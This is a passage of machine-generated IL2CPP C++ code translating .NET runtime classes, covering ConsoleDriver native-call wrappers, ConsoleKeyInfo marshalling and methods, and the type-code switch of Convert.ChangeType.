((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->set_called_isatty_2((bool)1); bool L_6 = ((ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_StaticFields*)il2cpp_codegen_static_fields_for(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var))->get_is_console_1(); return L_6; } } // System.Boolean System.ConsoleDriver::Isatty(System.IntPtr) extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37 (intptr_t ___handle0, const RuntimeMethod* method) { typedef bool (*ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37_ftn) (intptr_t); using namespace il2cpp::icalls; return ((ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37_ftn)mscorlib::System::ConsoleDriver::Isatty) (___handle0); } // System.Int32 System.ConsoleDriver::InternalKeyAvailable(System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t ConsoleDriver_InternalKeyAvailable_m4A48787A04F55E95C2EFD79A4727132C4B5B3468 (int32_t ___ms_timeout0, const RuntimeMethod* method) { typedef int32_t (*ConsoleDriver_InternalKeyAvailable_m4A48787A04F55E95C2EFD79A4727132C4B5B3468_ftn) (int32_t); using namespace il2cpp::icalls; return ((ConsoleDriver_InternalKeyAvailable_m4A48787A04F55E95C2EFD79A4727132C4B5B3468_ftn)mscorlib::System::ConsoleDriver::InternalKeyAvailable) (___ms_timeout0); } // System.Boolean System.ConsoleDriver::TtySetup(System.String,System.String,System.Byte[]&,System.Int32*&) extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_TtySetup_m39158C369CFA6D426B61D89621BC077B4BB62A49 (String_t* ___keypadXmit0, String_t* ___teardown1, ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** ___control_characters2, int32_t** ___address3, const RuntimeMethod* method) { typedef bool (*ConsoleDriver_TtySetup_m39158C369CFA6D426B61D89621BC077B4BB62A49_ftn) (String_t*, String_t*, ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821**, int32_t**); using namespace il2cpp::icalls; return ((ConsoleDriver_TtySetup_m39158C369CFA6D426B61D89621BC077B4BB62A49_ftn)mscorlib::System::ConsoleDriver::TtySetup) (___keypadXmit0, ___teardown1, ___control_characters2, ___address3); } // System.Boolean System.ConsoleDriver::SetEcho(System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_SetEcho_m7A27E092D9D79ED1033ACA3E033CAAEEA3E2B869 (bool ___wantEcho0, const RuntimeMethod* method) { typedef bool (*ConsoleDriver_SetEcho_m7A27E092D9D79ED1033ACA3E033CAAEEA3E2B869_ftn) (bool); using namespace il2cpp::icalls; return ((ConsoleDriver_SetEcho_m7A27E092D9D79ED1033ACA3E033CAAEEA3E2B869_ftn)mscorlib::System::ConsoleDriver::SetEcho) (___wantEcho0); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // Conversion methods for marshalling of: System.ConsoleKeyInfo extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_pinvoke(const ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768& unmarshaled, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_pinvoke& marshaled) { marshaled.____keyChar_0 = static_cast<uint8_t>(unmarshaled.get__keyChar_0()); marshaled.____key_1 = unmarshaled.get__key_1(); marshaled.____mods_2 = unmarshaled.get__mods_2(); } extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_pinvoke_back(const ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_pinvoke& marshaled, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768& unmarshaled) { Il2CppChar unmarshaled__keyChar_temp_0 = 0x0; unmarshaled__keyChar_temp_0 = static_cast<Il2CppChar>(marshaled.____keyChar_0); unmarshaled.set__keyChar_0(unmarshaled__keyChar_temp_0); int32_t unmarshaled__key_temp_1 = 0; unmarshaled__key_temp_1 = marshaled.____key_1; unmarshaled.set__key_1(unmarshaled__key_temp_1); int32_t unmarshaled__mods_temp_2 = 0; unmarshaled__mods_temp_2 = marshaled.____mods_2; unmarshaled.set__mods_2(unmarshaled__mods_temp_2); } // Conversion method for clean up from marshalling of: System.ConsoleKeyInfo extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_pinvoke_cleanup(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_pinvoke& marshaled) { } // Conversion methods for marshalling of: System.ConsoleKeyInfo extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_com(const ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768& unmarshaled, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_com& marshaled) { marshaled.____keyChar_0 = static_cast<uint8_t>(unmarshaled.get__keyChar_0()); marshaled.____key_1 = unmarshaled.get__key_1(); marshaled.____mods_2 = unmarshaled.get__mods_2(); } extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_com_back(const ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_com& marshaled, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768& unmarshaled) { Il2CppChar unmarshaled__keyChar_temp_0 = 0x0; unmarshaled__keyChar_temp_0 = static_cast<Il2CppChar>(marshaled.____keyChar_0); unmarshaled.set__keyChar_0(unmarshaled__keyChar_temp_0); int32_t unmarshaled__key_temp_1 = 0; unmarshaled__key_temp_1 = marshaled.____key_1; unmarshaled.set__key_1(unmarshaled__key_temp_1); int32_t unmarshaled__mods_temp_2 = 0; unmarshaled__mods_temp_2 = marshaled.____mods_2; unmarshaled.set__mods_2(unmarshaled__mods_temp_2); } // Conversion method for clean up from marshalling of: System.ConsoleKeyInfo extern "C" void ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshal_com_cleanup(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_marshaled_com& marshaled) { } // System.Void System.ConsoleKeyInfo::.ctor(System.Char,System.ConsoleKey,System.Boolean,System.Boolean,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, Il2CppChar ___keyChar0, int32_t ___key1, bool ___shift2, bool ___alt3, bool ___control4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___key1; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000c; } } { int32_t L_1 = ___key1; if ((((int32_t)L_1) <= ((int32_t)((int32_t)255)))) { goto IL_0021; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral42CAA54DEC95448BFC9996931A9ABF8CD93DF00F, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteralA62F2225BF70BFACCBC7F1EF2A397836717377DE, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98_RuntimeMethod_var); } IL_0021: { Il2CppChar L_4 = ___keyChar0; __this->set__keyChar_0(L_4); int32_t L_5 = ___key1; __this->set__key_1(L_5); __this->set__mods_2(0); bool L_6 = ___shift2; if (!L_6) { goto IL_0047; } } { int32_t L_7 = __this->get__mods_2(); __this->set__mods_2(((int32_t)((int32_t)L_7|(int32_t)2))); } IL_0047: { bool L_8 = ___alt3; if (!L_8) { goto IL_0059; } } { int32_t L_9 = __this->get__mods_2(); __this->set__mods_2(((int32_t)((int32_t)L_9|(int32_t)1))); } IL_0059: { bool L_10 = ___control4; if (!L_10) { goto IL_006b; } } { int32_t L_11 = __this->get__mods_2(); __this->set__mods_2(((int32_t)((int32_t)L_11|(int32_t)4))); } IL_006b: { return; } } extern "C" void ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98_AdjustorThunk (RuntimeObject * __this, Il2CppChar ___keyChar0, int32_t ___key1, bool ___shift2, bool ___alt3, bool ___control4, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98(_thisAdjusted, ___keyChar0, ___key1, ___shift2, ___alt3, ___control4, method); } // System.Char System.ConsoleKeyInfo::get_KeyChar() extern "C" IL2CPP_METHOD_ATTR Il2CppChar ConsoleKeyInfo_get_KeyChar_m6B17C3F0DF650E04D7C0C081E063AE31E8C14509 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method) { { Il2CppChar L_0 = __this->get__keyChar_0(); return L_0; } } extern "C" Il2CppChar ConsoleKeyInfo_get_KeyChar_m6B17C3F0DF650E04D7C0C081E063AE31E8C14509_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); return ConsoleKeyInfo_get_KeyChar_m6B17C3F0DF650E04D7C0C081E063AE31E8C14509(_thisAdjusted, method); } // System.ConsoleKey System.ConsoleKeyInfo::get_Key() extern "C" IL2CPP_METHOD_ATTR int32_t ConsoleKeyInfo_get_Key_m36CD740D4C51FB4F4277AC7E6CD24D79DF5C8AC5 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method) { { int32_t L_0 = __this->get__key_1(); return L_0; } } extern "C" int32_t ConsoleKeyInfo_get_Key_m36CD740D4C51FB4F4277AC7E6CD24D79DF5C8AC5_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); return ConsoleKeyInfo_get_Key_m36CD740D4C51FB4F4277AC7E6CD24D79DF5C8AC5(_thisAdjusted, method); } // System.Boolean System.ConsoleKeyInfo::Equals(System.Object) extern "C" IL2CPP_METHOD_ATTR bool ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!((RuntimeObject *)IsInstSealed((RuntimeObject*)L_0, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_il2cpp_TypeInfo_var))) { goto IL_0015; } } { RuntimeObject * L_1 = ___value0; bool L_2 = ConsoleKeyInfo_Equals_m856A0CCC02F22515A8D33AB4B574FC2E7D42C13B((ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *)__this, ((*(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *)((ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *)UnBox(L_1, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768_il2cpp_TypeInfo_var)))), /*hidden argument*/NULL); return L_2; } IL_0015: { return (bool)0; } } extern "C" bool ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867_AdjustorThunk (RuntimeObject * __this, RuntimeObject * ___value0, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); return ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867(_thisAdjusted, ___value0, method); } // System.Boolean System.ConsoleKeyInfo::Equals(System.ConsoleKeyInfo) extern "C" IL2CPP_METHOD_ATTR bool ConsoleKeyInfo_Equals_m856A0CCC02F22515A8D33AB4B574FC2E7D42C13B (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ___obj0, const RuntimeMethod* method) { { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_0 = ___obj0; Il2CppChar L_1 = L_0.get__keyChar_0(); Il2CppChar L_2 = __this->get__keyChar_0(); if ((!(((uint32_t)L_1) == ((uint32_t)L_2)))) { goto IL_002b; } } { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_3 = ___obj0; int32_t L_4 = L_3.get__key_1(); int32_t L_5 = __this->get__key_1(); if ((!(((uint32_t)L_4) == ((uint32_t)L_5)))) { goto IL_002b; } } { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_6 = ___obj0; int32_t L_7 = L_6.get__mods_2(); int32_t L_8 = __this->get__mods_2(); return (bool)((((int32_t)L_7) == ((int32_t)L_8))? 1 : 0); } IL_002b: { return (bool)0; } } extern "C" bool ConsoleKeyInfo_Equals_m856A0CCC02F22515A8D33AB4B574FC2E7D42C13B_AdjustorThunk (RuntimeObject * __this, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ___obj0, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); return ConsoleKeyInfo_Equals_m856A0CCC02F22515A8D33AB4B574FC2E7D42C13B(_thisAdjusted, ___obj0, method); } // System.Int32 System.ConsoleKeyInfo::GetHashCode() extern "C" IL2CPP_METHOD_ATTR int32_t ConsoleKeyInfo_GetHashCode_mC17663E6043305F599B0AE2DC7534466C9CD6C28 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method) { { Il2CppChar L_0 = __this->get__keyChar_0(); int32_t L_1 = __this->get__mods_2(); return ((int32_t)((int32_t)L_0|(int32_t)L_1)); } } extern "C" int32_t ConsoleKeyInfo_GetHashCode_mC17663E6043305F599B0AE2DC7534466C9CD6C28_AdjustorThunk (RuntimeObject * __this, const RuntimeMethod* method) { ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * _thisAdjusted = reinterpret_cast<ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 *>(__this + 1); return ConsoleKeyInfo_GetHashCode_mC17663E6043305F599B0AE2DC7534466C9CD6C28(_thisAdjusted, method); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.ContextBoundObject::.ctor() extern "C" IL2CPP_METHOD_ATTR void ContextBoundObject__ctor_m39DB4687A77E8C96932EEDE05C2E804610B24F5A (ContextBoundObject_tB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0 * __this, const RuntimeMethod* method) { { MarshalByRefObject__ctor_mD1C6F1D191B1A50DC93E8B214BCCA9BD93FDE850(__this, /*hidden argument*/NULL); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.ContextStaticAttribute::.ctor() extern "C" IL2CPP_METHOD_ATTR void ContextStaticAttribute__ctor_mD5E2915052C052139CB7FF4890A7D7DEEA6E45A6 (ContextStaticAttribute_tDE78CF42C2CA6949E7E99D3E63D35003A0660AA6 * __this, const RuntimeMethod* method) { { Attribute__ctor_m45CAD4B01265CC84CC5A84F62EE2DBE85DE89EC0(__this, /*hidden argument*/NULL); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TypeCode System.Convert::GetTypeCode(System.Object) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_GetTypeCode_mFE36252E332A7D699C91003DF56C37380C1AD58D (RuntimeObject * ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_GetTypeCode_mFE36252E332A7D699C91003DF56C37380C1AD58D_MetadataUsageId); s_Il2CppMethodInitialized = true; } RuntimeObject* V_0 = NULL; { RuntimeObject * L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (int32_t)(0); } IL_0005: { RuntimeObject * L_1 = ___value0; V_0 = ((RuntimeObject*)IsInst((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)); RuntimeObject* L_2 = V_0; if (!L_2) { goto IL_0016; } } { RuntimeObject* L_3 = V_0; int32_t L_4 = InterfaceFuncInvoker0< int32_t >::Invoke(0 /* System.TypeCode System.IConvertible::GetTypeCode() */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_3); return L_4; } IL_0016: { return (int32_t)(1); } } // System.Object System.Convert::ChangeType(System.Object,System.TypeCode,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492 (RuntimeObject * ___value0, int32_t ___typeCode1, RuntimeObject* ___provider2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_MetadataUsageId); s_Il2CppMethodInitialized = true; } RuntimeObject* V_0 = NULL; { RuntimeObject * L_0 = ___value0; if (L_0) { goto IL_0011; } } { int32_t L_1 = ___typeCode1; if (!L_1) { goto IL_000f; } } { int32_t L_2 = ___typeCode1; if ((((int32_t)L_2) == ((int32_t)((int32_t)18)))) { goto IL_000f; } } { int32_t L_3 = ___typeCode1; if ((!(((uint32_t)L_3) == ((uint32_t)1)))) { goto IL_0011; } } IL_000f: { return NULL; } IL_0011: { RuntimeObject * L_4 = ___value0; V_0 = ((RuntimeObject*)IsInst((RuntimeObject*)L_4, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)); RuntimeObject* L_5 = V_0; if (L_5) { goto IL_002b; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8E235C85706AEC625982AEEA41C686B14E89F326, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_7 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_7, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_RuntimeMethod_var); } IL_002b: { int32_t L_8 = ___typeCode1; switch (L_8) { case 0: { goto IL_0152; } case 1: { goto IL_0140; } case 2: { goto IL_0142; } case 3: { goto IL_0082; } case 4: { goto IL_008f; } case 5: { goto IL_009c; } case 6: { goto IL_00a9; } case 7: { goto IL_00b6; } case 8: { goto IL_00c3; } case 9: { goto IL_00d0; } case 10: { goto IL_00dd; } case 11: { goto IL_00ea; } case 12: { goto IL_00f7; } case 13: { goto IL_0104; } case 14: { goto IL_0111; } case 15: { goto IL_011e; } case 16: { goto IL_012b; } case 17: { goto IL_0162; } case 18: { goto IL_0138; } } } { goto IL_0162; } IL_0082: { RuntimeObject* L_9 = V_0; RuntimeObject* L_10 = ___provider2; bool L_11 = InterfaceFuncInvoker1< bool, RuntimeObject* >::Invoke(1 /* System.Boolean System.IConvertible::ToBoolean(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_9, L_10); bool L_12 = L_11; RuntimeObject * L_13 = Box(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_il2cpp_TypeInfo_var, &L_12); return L_13; } IL_008f: { RuntimeObject* L_14 = V_0; RuntimeObject* L_15 = ___provider2; Il2CppChar L_16 = InterfaceFuncInvoker1< Il2CppChar, RuntimeObject* >::Invoke(2 /* System.Char System.IConvertible::ToChar(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_14, L_15); Il2CppChar L_17 = L_16; RuntimeObject * L_18 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_17); return L_18; } IL_009c: { RuntimeObject* L_19 = V_0; RuntimeObject* L_20 = ___provider2; int8_t L_21 = InterfaceFuncInvoker1< int8_t, RuntimeObject* >::Invoke(3 /* System.SByte System.IConvertible::ToSByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_19, L_20); int8_t L_22 = L_21; RuntimeObject * L_23 = Box(SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_il2cpp_TypeInfo_var, &L_22); return L_23; } IL_00a9: { RuntimeObject* L_24 = V_0; RuntimeObject* L_25 = ___provider2; uint8_t L_26 = InterfaceFuncInvoker1< uint8_t, RuntimeObject* >::Invoke(4 /* System.Byte System.IConvertible::ToByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_24, L_25); uint8_t L_27 = L_26; RuntimeObject * L_28 = Box(Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_il2cpp_TypeInfo_var, &L_27); return L_28; } IL_00b6: { RuntimeObject* L_29 = V_0; RuntimeObject* L_30 = ___provider2; int16_t L_31 = InterfaceFuncInvoker1< int16_t, RuntimeObject* >::Invoke(5 /* System.Int16 System.IConvertible::ToInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_29, L_30); int16_t L_32 = L_31; RuntimeObject * L_33 = Box(Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_il2cpp_TypeInfo_var, &L_32); return L_33; } IL_00c3: { RuntimeObject* L_34 = V_0; RuntimeObject* L_35 = ___provider2; uint16_t L_36 = InterfaceFuncInvoker1< uint16_t, RuntimeObject* >::Invoke(6 /* System.UInt16 System.IConvertible::ToUInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_34, L_35); uint16_t L_37 = L_36; RuntimeObject * L_38 = Box(UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_il2cpp_TypeInfo_var, &L_37); return L_38; } IL_00d0: { RuntimeObject* L_39 = V_0; RuntimeObject* L_40 = ___provider2; int32_t L_41 = InterfaceFuncInvoker1< int32_t, RuntimeObject* >::Invoke(7 /* System.Int32 System.IConvertible::ToInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_39, L_40); int32_t L_42 = L_41; RuntimeObject * L_43 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_42); return L_43; } IL_00dd: { RuntimeObject* L_44 = V_0; RuntimeObject* L_45 = ___provider2; uint32_t L_46 = InterfaceFuncInvoker1< uint32_t, RuntimeObject* >::Invoke(8 /* System.UInt32 System.IConvertible::ToUInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_44, L_45); uint32_t L_47 = L_46; RuntimeObject * L_48 = Box(UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_il2cpp_TypeInfo_var, &L_47); return L_48; } IL_00ea: { RuntimeObject* L_49 = V_0; RuntimeObject* L_50 = ___provider2; int64_t L_51 = InterfaceFuncInvoker1< int64_t, RuntimeObject* >::Invoke(9 /* System.Int64 System.IConvertible::ToInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_49, L_50); int64_t L_52 = L_51; RuntimeObject * L_53 = Box(Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_il2cpp_TypeInfo_var, &L_52); return L_53; } IL_00f7: { RuntimeObject* L_54 = V_0; RuntimeObject* L_55 = ___provider2; uint64_t L_56 = InterfaceFuncInvoker1< uint64_t, RuntimeObject* >::Invoke(10 /* System.UInt64 System.IConvertible::ToUInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_54, L_55); uint64_t L_57 = L_56; RuntimeObject * L_58 = Box(UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_il2cpp_TypeInfo_var, &L_57); return L_58; } IL_0104: { RuntimeObject* L_59 = V_0; RuntimeObject* L_60 = ___provider2; float L_61 = InterfaceFuncInvoker1< float, RuntimeObject* >::Invoke(11 /* System.Single System.IConvertible::ToSingle(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_59, L_60); float L_62 = L_61; RuntimeObject * L_63 = Box(Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_il2cpp_TypeInfo_var, &L_62); return L_63; } IL_0111: { RuntimeObject* L_64 = V_0; RuntimeObject* L_65 = ___provider2; double L_66 = InterfaceFuncInvoker1< double, RuntimeObject* >::Invoke(12 /* System.Double System.IConvertible::ToDouble(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_64, L_65); double L_67 = L_66; RuntimeObject * L_68 = Box(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_il2cpp_TypeInfo_var, &L_67); return L_68; } IL_011e: { RuntimeObject* L_69 = V_0; RuntimeObject* L_70 = ___provider2; Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_71 = InterfaceFuncInvoker1< Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 , RuntimeObject* >::Invoke(13 /* System.Decimal System.IConvertible::ToDecimal(System.IFormatProvider) */, 